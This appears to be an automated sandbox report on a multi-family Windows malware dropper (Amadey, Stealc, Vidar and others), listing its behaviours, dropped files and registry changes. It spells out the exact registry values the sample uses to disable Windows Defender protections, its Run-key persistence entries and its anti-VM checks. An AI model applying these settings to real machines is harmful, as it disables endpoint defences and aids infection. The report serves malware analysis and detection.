Malware Analysis Report

2025-04-03 09:18

Sample ID 250306-cfxzmswks3
Target a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
SHA256 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
Tags
amadey gcleaner healer litehttp stealc systembc 092155 trump bot defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan vidar ir7am
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972

Threat Level: Known bad

The file a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972 was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc systembc 092155 trump bot defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan vidar ir7am

GCleaner

Detect Vidar Stealer

Vidar

Vidar family

Healer

Modifies Windows Defender Real-time Protection settings

Detects Healer an antivirus disabler dropper

Healer family

Litehttp family

LiteHTTP

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender TamperProtection settings

SystemBC

Amadey family

Stealc family

Stealc

Modifies Windows Defender notification settings

Systembc family

Gcleaner family

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Windows security modification

Loads dropped DLL

Executes dropped EXE

.NET Reactor proctector

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Adds Run key to start application

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Browser Information Discovery

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies system certificate store

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 02:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 02:01

Reported

2025-03-06 02:04

Platform

win7-20240729-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rbkvgg\bdhx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rbkvgg\bdhx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rbkvgg\bdhx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\ProgramData\rbkvgg\bdhx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\ProgramData\rbkvgg\bdhx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\765aeb8838.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\765aeb8838.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\151fdd87ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\151fdd87ae.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac8277ecde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\ac8277ecde.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\b7ef68053e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\b7ef68053e.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc32b0ba15.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\dc32b0ba15.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rbkvgg\bdhx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
